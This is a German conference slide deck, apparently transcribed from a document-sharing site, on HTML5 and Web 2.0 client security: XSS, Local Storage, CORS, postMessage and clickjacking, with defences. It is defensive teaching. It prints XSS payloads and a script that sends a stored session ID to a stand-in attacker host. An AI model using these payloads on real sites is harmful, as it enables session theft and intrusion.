Carsten Eilers / Client Security im Web 2.0 und mit HTML5

Größe: px
Ab Seite anzeigen:

Download "Carsten Eilers / www.ceilers-it.de. Client Security im Web 2.0 und mit HTML5"

Transkript

1 Carsten Eilers / Client Security im Web 2.0 und mit HTML5

2 Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: Schwachstellen- und Exploitsammlung

3 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlußbemerkungen

4 Es war einmal... (1) Ajax in Action 2007: AJAX, aber sicher! XSS und CSRF JavaScript Port Scanner Schwachstellenscanner Jikto JavaScript-Malware allgemein JavaScript-/JSON-Hijacking Fazit : Verhindern Sie XSS & CSRF

5 Es war einmal... (2) Ajax in Action 2008 Sicherheit und der Ajax-Client SQL-Injection via Client Angriffe auf Presentation Layer Look&Feel-Hacks Ganz neu: Clickjacking (Einzige) Gegenmaßnahme: Framebuster

6 HTML5 bringt Die Gegenwart neue Funktionen neue Attribute neue Tags Clickjacking & Likejacking sind Alltag

7 Was ist HTML5? Die nächste Version von HTML Fast eine Entwicklungsumgebung Drei Aspekte: Inhalt (HTML5) Präsentation (CSS) Interaktion mit dem Benutzer (JavaScript) Kein Standard / Work in progress

8 HTML5 & XSS Agenda Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

9 HTML5 & XSS (1) Kein Standard => Jeder macht, was er will wie er will Unterschiedliche Interpretationen sind immer unsicher

10 HTML5 & XSS (2) Neue Tags z.b. audio- und video-tags: <audio src=1 onerror= alert(1) > <video src=1 onerror= alert(1) > Geänderte und neue Attribute für alte Tags z.b. Attribute in schließenden Tags: </a onmouseover= alert(1) >

11 HTML5 & XSS (3) z.b. autofocus-attribut: <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)>

12 HTML5 & XSS (4) autofocus-attribut bringt Element mit schädlichen Inhalt in den Focus poster- und srcdoc-attribut erlauben Verweis auf schädliche externe Ressourcen

13 HTML5 & XSS (5) SVG ist eine Grafik? SVG ist auch ein Einfallstor für XSS: <svg xmlns="http://www.w3.org/2000/svg"> <script>alert(1)</script> </svg> z.b. in Firefox < 4

14 HTML5 & XSS (6) Lange Liste im HTML5 Security Cheatsheet Insbesondere Blacklists gefährdet Auch Whitelists anpassen z.b. die früher harmlosen schließenden Tags wie </a>

15 HTML5 & XSS (7) Wann haben Sie das letzte Mal die Schutzmaßnahmen alter Anwendungen aktualisiert? Oder auch nur angesehen? Never touch a running system!???

16 Agenda HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

17 Local & Session Storage 5-10 MB Speicher als Key-Value-Paare (Cookie 4 KB) Inhalt wird nicht wie bei Cookies an den Server gesendet Session Storage an Fenster gebunden, Local Storage ist persistent

18 HTML5 & Local Storage (1) Zugriff an Hostname gebunden geocities.com/gute-seiten vs. geocities.com/boese-seiten Zugriff über XSS <script> document.write("<img src= 'http://angreifer.example/klau.php?geklaut= "+localstorage.getitem('sessionid')+"'>"); </script>

19 HTML5 & Local Storage (2) Zugriff durch Schadsoftware auf dem Client Zugriff durch andere Benutzer Z.B. Google Mail: Statt Cookies ausspähen o.ä. nun direkter Zugriff auf dem Client möglich

20 HTML5 & Local Storage (3) Wie erkennt man Angriffe? Lese-Zugriffe? - Gar nicht! Manipulationen? - Eigentlich auch nicht!

21 HTML5 & Local Storage (4) Beispiel Session-ID: Cookie mit HTTPOnly-Flag (und ggf. Secure-Flag) Local Storage JavaScript soll zugreifen können!

22 HTML5 & Local Storage (5) Immer daran denken: Daten sind unverschlüsselt, jeder auf dem Client kann darauf zugreifen Daten bleiben ewig erhalten, außer Benutzer oder Anwendung löscht

23 HTML5 & Local Storage (6) Schutzmaßnahmen: Keine Sensitiven Daten speichern Löschen nicht vergessen!

24 HTML5 & Local Storage (7) Verschlüsselung meist nutzlos sowieso nur Zeitschloss Schlüssel auf Client => Daten de fakto unverschlüsselt Schlüssel auf Server => keine Offline-Nutzung

25 HTML5 & XSS Local Storage SQL-Datenbank Agenda Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

26 HTML5 & SQL-Datenbank (1) SQL-Datenbank auf dem Client => SQL-Injection betrifft auch den Client Prepared Statements statt zusammengesetzter Strings HTML5 Database API hilft

27 HTML5 & SQL-Datenbank (2) executesql("select spalte FROM tabelle WHERE wert=" + eingabe); executesql("select spalte FROM tabelle WHERE wert=?", [eingabe]); Eingabe kein String, sondern Literal 'nix' OR 1=1

28 HTML5 & SQL-Datenbank (3) Auch ohne SQL-Injection gefährdet Same Origin Policy schützt: Daten über HTTPS gespeichert => Zugriff nur über HTTPS möglich Besser als 'Secure'-Flag für Cookies, da automatisch

29 HTML5 & SQL-Datenbank (4) Same Origin Policy schützt nicht vor XSS... bei DNS-Hijacking... bei Manipulation der lokalen Namensauflösung... bei MitM-Angriff

30 HTML5 & SQL-Datenbank (5) Zufällige Namen erschweren Zugriffe eindeutig, aber nicht erratbar Onlinenutzung: Auf Server speichern Offlinenutzung: Offline-Passwort + Benutzername = Datenbankname

31 HTML5 & SQL-Datenbank (6) Wie erkennt man Angriffe? Gar nicht (siehe Local Storage)

32 HTML5 & Speicher (1) Client-Daten können Schadcode enthalten Auf Server prüfen ist selbstverständlich Auf Client gegen XSS kodieren z.b. mit OWASP Enterprise Security API (owasp-esapi-js) JavaScript-Funktion kann überschrieben werden!

33 HTML5 & Speicher (2) Egal ob Local Storage oder SQL-DB: Speichern Sie erst nach Zustimmung des Benutzers! Gilt nur für den aktuellen Rechner den sie nicht an vorhandener DB erkennen Besser: Allgemein gültige DB-Tabelle enthält letzte Session-ID Vergleich mit Wert auf dem Server

34 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Agenda Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

35 HTML5 & Wurmkuren (1) Ein XSS-Wurm verbreitet sich über unsere Webanwendung Bisher: Schwachstelle beheben, Wurmcode auf dem Server löschen, Wurm tot

36 HTML5 & Wurmkuren (2) Ein XSS-Wurm verbreitet sich über unsere Webanwendung Jetzt: Schwachstelle beheben, Wurmcode auf dem Server löschen, Wurmcode auf den Clients löschen, Wurm tot Wirklich?

37 HTML5 & Wurmkuren (3) Wie lange dauert es, bis sich alle Benutzer mal wieder angemeldet haben? Bis dahin Gefahr bei Offline-Nutzung Was ist, wenn der Wurm weiteren Schadcode nachlädt?

38 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Agenda Cross Origin Requests postmesssage() iframe im Sandkasten

39 HTML5 & Session Storage (1) Wie Local Storage, aber auf Session- Dauer beschränkt Same Origin Policy schützt: Zugriffe an Domain, Protokoll, Port gebunden Kein Schutz vor XSS, aber vor böser Umgebung

40 HTML5 & Session Storage (2) Löschen nicht vergessen! Beispiel Webmail, mehrere Tabs offen In einem wird sich ausgeloggt Andere bleiben offen Darin Zugriff auf Session Storage möglich

41 HTML5 & Session Storage (3) Mögliche Lösung: Cookie enthält aktuellen Status Nach Einloggen Cookie-Wert, Datum und Uhrzeit in den Session Storage Bei jedem Zugriff Werte vergleichen Cookie ist immer & überall aktuell

42 HTML5 & XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Agenda Cross Origin Requests postmesssage() iframe im Sandkasten

43 HTML5 & Cross Origin (1) Cross Origin Requests hebeln Same Origin Policy aus Einschränkung über 'Access-Control- Allow-Origin'-Header Ein '*' - und die Anwendung ist offen für alle Vorsicht vor Vereinfachungen (z.b. eingebundene Konfigurationsdatei)

44 HTML5 & Cross Origin (2) 'Origin'-Header nicht vertrauenswürdig! if ($_SERVER['HTTP_ORIGIN'] == "[Server]") { header('access-control-allow-origin: [Server]'); // Ausgabe vertraulicher Informationen } else { // Ausgabe harmloser Informationen } zusätzlich Authentifizierung nötig

45 HTML5 & Cross Origin (3) Authentifizierung: Signalisiert über 'Access-Control-Allow-Credentials'- Header z.b. in Antwort auf Preflight-Request Cross Origin Request mit 'Credentials'- Flag und Authentifizierungsdaten

46 HTML5 & Cross Origin (4) Vertrauen, wem Vertrauen gebührt! Website, die Request sendet, vertraut auf korrekte Antwort Website, die Request empfängt, vertraut auf Autorisierung Was ist mit kompromittiertem Server?

47 HTML5 & Cross Origin (5) Bösartige Requests Jeder kann Cross Origin Request senden Nur vor komplizierten Requests Prüfung mit Preflight-Request Browser prüfen nur, ob auf Antwort zugegriffen werden darf

48 HTML5 & Agenda XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

49 HTML5 & postmessage() (1) Ziel: Daten zwischen Skripten aus verschiedenen Domains austauschen Aufruf mit Daten und Domain des Ziels Nützlich für Widgets Früher: Eingesperrt in iframe oder offen im script-tag Nun: Sicherheit des iframes, Kommunikation des script-tag

50 HTML5 & postmessage() (2) Sicherheit: Browser liefert Daten nur aus, wenn Domain stimmt Datenleck nicht möglich Zieldomain genau angeben, nicht als '*' Aber woher kommen die Daten? Absender im origin-attribut prüfen XSS?

51 HTML5 & Agenda XSS Local Storage SQL-Datenbank Wurmkuren Session Storage Cross Origin Requests postmesssage() iframe im Sandkasten

52 HTML5 & iframe-sandbox (1) Neu: sandbox-attribut für iframes beschränkt Möglichkeiten für iframes Per Default kein Zugriff auf DOM der einbettenden Seite, Cookies, Local Storage kein JavaScript-Code, keine Plugins, keine Formulare Gezieltes Aufheben möglich

53 HTML5 & iframe-sandbox (2) allow-same-origin iframe wird wie aus eigener Domain behandelt allow-top-navigation Oberste Ebene des akt. Inhalts ändern allow-forms Formulare sind zulässig allow-skripts Skripte erlaubt, Zugriff auf Umgebung möglich

54 HTML5 & iframe-sandbox (3) Zusätzliche Sicherheitsmaßnahme Scheitert XSS-Filter, schützt Sandbox vor eingeschleustem Code Abgestuftes Freigeben von Funktionen Werbung in iframe ohne Rechte (Schutz vor kompromittiertem Adserver) Widgets in iframe mit JavaScript- Ausführung...

55 Clickjacking & sein Hintergrund Agenda Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

56 Clickjacking (1) Veröffentlicht 2008 von Jeremiah Grossmann und Robert Hansen Opfer auf Seite des Angreifers locken Opfer klickt etwas an Klick landet in unsichtbaren iframe mit anderer Website

57 Adobes Settings Manager

58

59

60

61 Agenda Clickjacking & sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

62 HTML5 & Clickjacking (1) Black Hat Europe 2010: Paul Stone kombiniert Clickjacking und HTML5 Fragment-Identifier erleichtern das Zielen Drag&Drop-API erlaubt mehr als das Entführen von Klicks

63 HTML5 & Clickjacking (2) Texte in Textfelder einfügen Opfer verschiebt Objekt auf bösartiger Website Beim Start wird Text des Angreifers über Drag&Drop- API ausgewählt Nun unsichtbaren iframe mit angegriffenen Formular unter Mauszeiger legen Beim Fallen lassen landet der Text im Formular Beliebig oft wiederholen, Senden durch Clickjacking

64 Clickjacking & Agenda sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

65 HTML5 & Clickjacking (3) Texte kopieren Same Origin Policy verhindert Zugriff auf Inhalte von anderen Domains, z.b. in iframes Lösung: Drag&Drop-API und Clickjacking

66 HTML5 & Clickjacking (4) unsichtbarer iframe am Mauszeiger gewünschtes Dokument in den iframe Opfer muss Verschiebe-Operation starten (Maustaste drücken) Dokument so pos., das Ende unter Mauszeiger Benutzer muss Maus etwas bewegen (Text auswählen) Benutzer muss Maustaste loslassen

67 HTML5 & Clickjacking (5) Text ist nun selektiert Dokument so pos., das selektierter Text unter Mauszeiger liegt Drag&Drop-Aktion: Text in Textfeld einfügen, s.o. Angreifer kann Text z.b. über getdata() lesen oder Formular abschicken

68 HTML5 & Clickjacking (6) Angreifer bestimmt Positionen Kann einfach ganze (unbekannte) Seite kopieren Auch Zugriff auf Browser-Plugins möglich

69 HTML5 & Clickjacking (7) Alles nur Theorie? Mai 2011: Cookiejacking im IE Schwachstelle im Sicherheitsmodell: file:// erlaubt Zugriff auf lokale Dateien Konkret: Die Cookies Cookies in iframe laden Text mit Clickjacking kopieren Schwachstelle im IE behoben

70 Agenda Clickjacking & sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

71 HTML5 & Clickjacking (8) HTML-Quelltexte kopieren Für Angreifer interessant: versteckte Formularfelder etc. Editorfunktionen für HTML helfen (contenteditable-attribut) Text in entsprechenden Bereich auf Angreifer-Seite verschieben

72 HTML5 & Clickjacking (9) Ergebnisse unterschiedlich: IE und Firefox: Alles zwischen ersten und letztem sichtbaren Element Webkit-Browser, z.b. Chrome: Nur sichtbare Elemente, aber inkl. Attributen wie IDs, Klassen, URLs

73 Clickjacking & Agenda sein Hintergrund Texte in Textfelder einfügen Texte kopieren HTML-Quelltext kopieren Schutzmaßnahmen

74 HTML5 & Clickjacking (10) Framebuster schützt vor Clickjacking: <script type="text/javascript"> if (top!=self) top.location.href=self.location.href; </script> Framebuster lassen sich u.u. umgehen z.b. im IE mit eingeschränkter Zone

75 HTML5 & Clickjacking (11) Framebuster schützte vor Clickjacking: iframe mit Sandbox-Attribut verhindert Ausführung Einziger Schutz: "X-FRAME-OPTIONS"-Header

76 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlussbemerkungen

77 Buttonjacking (1) Mai 2010: Erster Clickjacking-Angriff auf Facebooks Like -Button Neuer Name: Likejacking Seitdem liegt Facebook quasi unter Dauerbeschuss

78 Buttonjacking (2) Problem des Like-Buttons: Er soll eingebunden werden Weder Framebuster noch "X-FRAME- OPTIONS"-Header möglich Facebook bekämpft nur Symptome (bekannte Angriffe)

79 Buttonjacking (3) Wieso Likejacking? Betroffen sind alle derartigen Buttons Sommer 2011: Twitters Follow -Button Googles 1+ -Button

80 Buttonjacking (4) Logische Schlussfolgerung: Vergessen Sie 1-Klick-Buttons, Verlangen Sie eine Bestätigung

81 Agenda Vorbemerkungen HTML5 Clickjacking Buttonjacking Schlussbemerkungen

82 Schlussbemerkungen Application Cache: Cache Poisoning ist möglich Websockets: Böse Netzverkverbindungen aus dem Browser heraus, z.b. BEAST (kurzzeitig) Zugriff auf Webcam: Angreifer schaut Ihnen zu...

83 Fragen?

84 Vielen Dank für Ihre Aufmerksamkeit Material und Links auf

85 The End

Ajax, aber sicher! Carsten Eilers

Ajax, aber sicher! Carsten Eilers Ajax, aber sicher! Carsten Eilers Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Schwachstellen-Datenbank Security Aktuell auf entwickler.de Vorstellung Carsten Eilers, www.ceilers-it.de

Mehr

Carsten Eilers. Ajax Security. Sichere Web-2.0-Anwendungen. ntwickier

Carsten Eilers. Ajax Security. Sichere Web-2.0-Anwendungen. ntwickier Carsten Eilers Ajax Security Sichere Web-2.0-Anwendungen ntwickier Ajax, aber sicher! Geschichte Der Aufbau des Buchs Danksagung und Widmung Der Autor Ajax - Grundlagen Vom Web 1.0 zum Web 2.0 XMLHttp

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

When your browser turns against you Stealing local files

When your browser turns against you Stealing local files Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester

Mehr

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet?

Erste Hilfe. «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Erste Hilfe «/IE Cache & Cookies» Logout, alte Seiten erscheinen, Erfasstes verschwindet? Cache Einstellungen Im Internet Explorer von Microsoft wie auch in anderen Browsern (zum Beispiel Firefox) gibt

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Netzwerksicherheit Übung 9 Websicherheit

Netzwerksicherheit Übung 9 Websicherheit Netzwerksicherheit Übung 9 Websicherheit David Eckhoff, Tobias Limmer, Christoph Sommer Computer Networks and Communication Systems Dept. of Computer Science, University of Erlangen-Nuremberg, Germany

Mehr

Sicherheit in Rich Internet Applications

Sicherheit in Rich Internet Applications Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Seite 2 Sicherheit in Rich Internet Applications Florian Kelbert 14.02.2008 Inhaltsverzeichnis Grundlagen Ajax und Mashups Adobe Flash-Player

Mehr

Carsten Eilers ceilers-it.de. Schwachstellen-Scans im Web 2.0

Carsten Eilers ceilers-it.de. Schwachstellen-Scans im Web 2.0 Carsten Eilers ceilers-it.de Schwachstellen-Scans im Web 2.0 Vorstellung» Berater für IT-Sicherheit» Autor» About Security» Standpunkt Sicherheit» und anderes...» Schwachstellen-Datenbank» Security Aktuell

Mehr

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.

Gefahr durch Cookies. Antonio Kulhanek. Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity. Gefahr durch Cookies Antonio Kulhanek Security Consultant Dipl. Techniker HF, Kommunikationstechnik MCSE, ITIL Foundation kulhanek@gosecurity.ch Rechtliche Hinweise Art. 143 StGB Unbefugte Datenbeschaffung

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

Developer Week 2013 Offline (mobile) Webdevelopment

Developer Week 2013 Offline (mobile) Webdevelopment Developer Week 2013 Offline (mobile) Webdevelopment Kerstin Blumenstein Grischa Schmiedl Wer bin ich & Woher komm ich? Warum eigentlich? Problemstellung Nutzungssituationen Zu Hause, auf Arbeit Unterwegs

Mehr

Carsten Eilers / www.ceilers-it.de. Sicherheit von Anfang an

Carsten Eilers / www.ceilers-it.de. Sicherheit von Anfang an Carsten Eilers / www.ceilers-it.de Sicherheit von Anfang an Vorstellung Berater für IT-Sicherheit Web Security (Pentests, Beratung,...)... Autor PHP Magazin, Entwickler Magazin Blog: www.ceilers-news.de...

Mehr

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian.

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel> Web-Sicherheit: Kein fauler Zauber?! Security Consulting GmbH, Karlsruhe Seite 1 Security Consulting GmbH, Karlsruhe Seite 2 Security Consulting GmbH, Karlsruhe Seite 3 Security

Mehr

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 Bei dem vierten Teil geht es um etwas praktisches: ein Emailformular, dass man auf der eigenen

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox

Carsten Eilers www.ceilers-it.de. Pentesters Toolbox Carsten Eilers www.ceilers-it.de Pentesters Toolbox Vorstellung Berater für IT-Sicherheit Autor PHP Magazin, Entwickler Magazin Buch Ajax Security www.ceilers-news.de und anderes... Schwachstellen-Datenbank

Mehr

Destructive AJAX. Stefan Proksch Christoph Kirchmayr

Destructive AJAX. Stefan Proksch Christoph Kirchmayr Destructive AJAX Stefan Proksch Christoph Kirchmayr AJAX-Einführung Asynchronous JavaScript And XML Clientseitiger JavaScript-Code Asynchrone Kommunikation XML DOM Klassisches Client-Server Modell AJAX-Modell

Mehr

Session Management und Cookies

Session Management und Cookies LMU - LFE Medieninformatik Blockvorlesung Web-Technologien Wintersemester 2005/2006 Session Management und Cookies Max Tafelmayer 1 Motivation HTTP ist ein zustandsloses Protokoll Je Seitenaufruf muss

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Secure Programming vs. Secure Development

Secure Programming vs. Secure Development Secure Programming vs. Secure Development Niklaus Schild Senior Consultant Niklaus.schild@trivadis.com Zürich, 10.Juni 2010 Basel Baden Bern Lausanne Zürich Düsseldorf Frankfurt/M. Freiburg i. Br. Hamburg

Mehr

Mashups, aber sicher. Carsten Eilers

Mashups, aber sicher. Carsten Eilers Mashups, aber sicher Carsten Eilers Vorstellung Berater für IT-Sicherheit Autor About Security Standpunkt Sicherheit Buch Ajax Security und anderes... Schwachstellen-Datenbank Security Aktuell auf entwickler.de

Mehr

> Internet Explorer 8

> Internet Explorer 8 > Internet Explorer 8 Browsereinstellungen optimieren Übersicht Inhalt Seite 1. Cache und Cookies löschen 2. Sicherheits- und Datenschutzeinstellungen 2 5 Stand Juli 2009 1. Cache und Cookies löschen Jede

Mehr

PHP-(Un-)Sicherheit. Hacker-Seminar Herbstsemester 2006 Laboratory for Dependable Distributed Systems Universität Mannheim.

PHP-(Un-)Sicherheit. Hacker-Seminar Herbstsemester 2006 Laboratory for Dependable Distributed Systems Universität Mannheim. Hacker-Seminar Herbstsemester 2006 Laboratory for Dependable Distributed Systems Universität Mannheim Tim Weber 9. November 2006 Übersicht 1. Die Sprache PHP 2. Sicherheitslücken und Angriffsszenarien

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Benutzerhandbuch. Gästebuch Software - YellaBook v1.0 http://www.yellabook.de. Stand: 01.08.2012. by YellaBook.de - Alle Rechte vorbehalten.

Benutzerhandbuch. Gästebuch Software - YellaBook v1.0 http://www.yellabook.de. Stand: 01.08.2012. by YellaBook.de - Alle Rechte vorbehalten. Benutzerhandbuch Gästebuch Software - YellaBook v1.0 http://www.yellabook.de Stand: 01.08.2012 Inhalt 1 Funktionen... 3 2 Systemanforderungen... 4 3 Installation... 4 4 Einbinden des Gästebuchs... 5 5

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

Die Cargo Plattform bietet einen sicheren und einfachen Datentransfer mit einem modernen Web- Interface.

Die Cargo Plattform bietet einen sicheren und einfachen Datentransfer mit einem modernen Web- Interface. Die Cargo Plattform bietet einen sicheren und einfachen Datentransfer mit einem modernen Web- Interface. Inhaltsverzeichnis Erste Schritte Anmelden 2 Startseite 3 Dateimanager 4 CargoLink 5 Freigaben 6

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Surfen, aber sicher! Basisschutz leicht gemacht. 10 Tipps für ein ungetrübtes Surf-Vergnügen

Surfen, aber sicher! Basisschutz leicht gemacht. 10 Tipps für ein ungetrübtes Surf-Vergnügen Surfen, aber sicher! Basisschutz leicht gemacht 10 Tipps für ein ungetrübtes Surf-Vergnügen Ins Internet mit Sicherheit! Viele nützliche und wichtige Dienstleistungen werden heute über das Internet in

Mehr

Unix Friends and User Campus Kamp Aktuelle Angriffstechniken auf Web-Applikationen

Unix Friends and User Campus Kamp Aktuelle Angriffstechniken auf Web-Applikationen Unix Friends and User Campus Kamp Aktuelle Angriffstechniken auf Web-Applikationen Steffen Tröscher cirosec GmbH, Heilbronn Steffen Tröscher Dipl.-Informatiker (FH) IT-Sicherheitsberater Tätigkeitsschwerpunkte:

Mehr

Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Welche Gefahren gehen vom Firmenauftritt im Internet aus? Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Mehr

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen

Mehr

OWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12

OWASP Top 10. im Kontext von Magento. Mittwoch, 21. November 12 OWASP Top 10 im Kontext von Magento 1 Ich Fabian Blechschmidt (@Fabian_ikono) blechschmidt@fabianblechschmidt.de PHP seit 2004 Freelancer seit 2008 Magento seit 2011 Certified Magento Developer spielt

Mehr

Sicherheit Web basierter Anwendungen

Sicherheit Web basierter Anwendungen Sicherheit Web basierter Anwendungen IT Sicherheit Dozent: Prof. Dr. Stefan Karsch Enriko Podehl 13.02.2008 Einleitung it Web basierte basierte Anwendungen Teil unseres Alltags Geben dabei persönliche

Mehr

Typo 3 installieren. Schritt 1: Download von Typo3

Typo 3 installieren. Schritt 1: Download von Typo3 Typo 3 installieren Bevor Sie Typo3 installieren, müssen Sie folgende Informationen beachten: Typo3 benötigt eine leere Datenbank. Mit Ihrem Abonnement verfügen Sie über eine einzige Datenbank. Sie können

Mehr

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST 2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.

Mehr

TYPO3-Kurzreferenz für Redakteure

TYPO3-Kurzreferenz für Redakteure TYPO3-Kurzreferenz für Redakteure Die Kurzreferenz orientiert sich weitgehend an den TYPO3 v4 Schulungsvideos. Es kann jedoch geringfügige Abweichungen geben, da in den Videos auf didaktisch sinnvolles

Mehr

Wordpress am eigenen Server installieren

